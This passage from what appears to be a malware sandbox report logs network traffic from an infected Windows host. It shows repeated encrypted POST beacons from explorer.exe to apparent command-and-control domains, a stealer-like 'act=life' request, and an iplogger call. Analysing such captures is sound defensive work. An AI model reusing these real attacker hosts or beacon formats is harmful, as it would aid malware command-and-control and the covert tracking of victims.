Dec 24, 2023 10:46:27.845046997 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:28.135246992 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49776	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:31.228791952 CET	271	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eegeaka.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 313 Host: host-host-file8.com
Dec 24, 2023 10:46:31.228820086 CET	313	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 31 b5 d7 02 Data Ascii: o=x6zFc47nYki\wu$f]d1lsBpD7MwYv_mR&}4o)W+b;Gd\|tN.GU3:@NBn;7V21h]PPZCMSt)N{07{G_m6>*
Dec 24, 2023 10:46:31.518884897 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:46:31 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49777	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:38.709193945 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mneomibvwxl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:38.709275961 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:38.999336958 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:38 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49778	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:42.170336962 CET	273	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://noovcjxlu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 286 Host: host-host-file8.com
Dec 24, 2023 10:46:42.170389891 CET	286	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 07 9f b3 74 Data Ascii: o=x6zFc47nYki\wu$f]dt8EgU{zb/?-zt$Rp51gX:-H"uf.C]HRZN,7]y#`Y!&W69XeDodj[JM<518sAcS
Dec 24, 2023 10:46:42.464502096 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:46:42 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49779	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:48.919523954 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rfpvesvronsb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:48.919593096 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:49.211972952 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49782	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:52.380636930 CET	274	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsmyycnofp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 357 Host: host-host-file8.com
Dec 24, 2023 10:46:52.380690098 CET	357	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 12 9b a2 24 Data Ascii: o=x6zFc47nYki\wu$f]d$1itv=Mq7-JN;9e9tUPTnkMVb[$]ZQy~HXI:n3vdM9js8iyTw)6*G&OG
Dec 24, 2023 10:46:52.696202040 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:46:52 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49783	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:59.278310061 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hvnltqldsjug.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:59.278350115 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:59.568320990 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:59 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49784	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:02.822066069 CET	274	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://isikivavrp.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 362 Host: host-host-file8.com
Dec 24, 2023 10:47:02.822096109 CET	362	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 48 db 92 76 Data Ascii: o=x6zFc47nYki\wu$f]dHv+yLf~:*Q{].;<Z!P?$w_UMdTYO%QK2P1M$?58MkOK1&~;LeS&lF;,uWjk1O
Dec 24, 2023 10:47:03.115035057 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:47:02 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49785	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:09.000361919 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ukteugvavlyypgl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:47:09.000377893 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:47:09.286612988 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:47:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49786	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:13.556703091 CET	271	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qeongox.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 347 Host: host-host-file8.com
Dec 24, 2023 10:47:13.556737900 CET	347	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 39 d9 ab 31 Data Ascii: o=x6zFc47nYki\wu$f]d91#m?:MrMf>ANffhiK`O1*m(nb_^D_U=w<G]T$S+a~:zKbe(Bg\|o^v>B\:&.,
Dec 24, 2023 10:47:13.861449003 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:47:13 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49787	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:18.992903948 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rgkncbxujwdmo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:47:18.992933989 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:47:19.286495924 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:47:19 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49788	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:23.105437994 CET	272	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mrddeqqi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: host-host-file8.com
Dec 24, 2023 10:47:23.105473042 CET	146	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 3c 9c 80 05 Data Ascii: o=x6zFc47nYki\wu$f]d<_iF8?^tJKVwv?&l9TL{Ojq2*!
Dec 24, 2023 10:47:23.846074104 CET	418	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mrddeqqi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: host-host-file8.com Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 3c 9c 80 05 5f b0 1e 69 e5 0b 46 1a 01 00 e9 f7 e2 38 c6 d3 88 f0 0f 3f 5e 18 74 93 4a 09 e0 19 4b 56 77 8f 76 98 ef 02 af 3f 26 10 6c 93 a8 39 54 4c f7 7b d4 c2 4f 6a d5 c4 71 8c 1a 32 0b ec 2a f0 21 d7 Data Ascii: o=x6zFc47nYki\wu$f]d<_iF8?^tJKVwv?&l9TL{Ojq2*!
Dec 24, 2023 10:47:24.136058092 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:47:23 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49789	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:29.608583927 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ttudmuiwmsd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:47:29.608623981 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:47:29.899305105 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:47:29 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49790	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:34.369707108 CET	272	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://akkgaxko.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: host-host-file8.com
Dec 24, 2023 10:47:34.369777918 CET	111	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 53 81 ba 72 Data Ascii: o=x6zFc47nYki\wu$f]dSrQe`w9fF[A6iz\|h
Dec 24, 2023 10:47:34.664534092 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:47:34 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49791	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:39.019675970 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nagykeemahie.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:47:39.019723892 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:47:39.309109926 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:47:39 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49792	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:44.867769957 CET	270	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kstfdv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 230 Host: host-host-file8.com
Dec 24, 2023 10:47:44.867813110 CET	230	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 40 cc cb 6f Data Ascii: o=x6zFc47nYki\wu$f]d@o>pej$_5M}yr{4OhpZN@VY<7'o=PW!Dlu': OLiF(.iU,Sr[!r}H?fo<rjP,f]]
Dec 24, 2023 10:47:45.162740946 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:47:45 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49793	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:47:49.085737944 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://nhjwecacxpuvxsi.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:47:49.085791111 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:47:49.377950907 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:47:49 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49722	172.67.176.11	443	1576	C:\Users\user\AppData\Local\Temp\23F8.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-24 09:44:31 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: chincenterblandwka.pw
2023-12-24 09:44:31 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2023-12-24 09:44:31 UTC	1327	IN	HTTP/1.1 200 OK Date: Sun, 24 Dec 2023 09:44:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o4arcg8q811o6vgu1096cjf5p9; expires=Thu, 18-Apr-2024 03:31:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Thu, 22-Feb-2024 09:44:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Thu, 22-Feb-2024 09:44:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Thu, 22-Feb-2024 09:44:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TM78NuZK9j2aYB5aOtWuw2rd4qJF9DpmerN%2FsqcX7oD2Op3iNz0i6oJDhanO%2BEpR5CQ7NFqbQZmfrRjjgfgUopnm8hdSeQWjATDgHW03pSXCRpxA2PMpnF%2Fhl0k5EaxcTWtAstdCkio%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 83a7e7faedd2741c-MIA alt-svc: h3=":443"; ma=86400
2023-12-24 09:44:31 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2023-12-24 09:44:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49762	172.67.188.178	443	3524	C:\Users\user\AppData\Local\Temp\InstallSetup9.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-24 09:45:57 UTC	127	OUT	GET /19nVA4 HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: iplogger.com Connection: Keep-Alive Cache-Control: no-cache
2023-12-24 09:45:57 UTC	1146	IN	HTTP/1.1 200 OK Date: Sun, 24 Dec 2023 09:45:57 GMT Content-Type: image/png Transfer-Encoding: chunked Connection: close set-cookie: 513216651719769300=2; expires=Tue, 24 Dec 2024 09:45:57 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict set-cookie: clhf03028ja=102.129.152.212; expires=Tue, 24 Dec 2024 09:45:57 GMT; Max-Age=31622400; path=/; secure; HttpOnly; SameSite=Strict memory: 0.42160797119140625 expires: Sun, 24 Dec 2023 09:45:57 +0000 Cache-Control: no-store, no-cache, must-revalidate strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC Report-To: 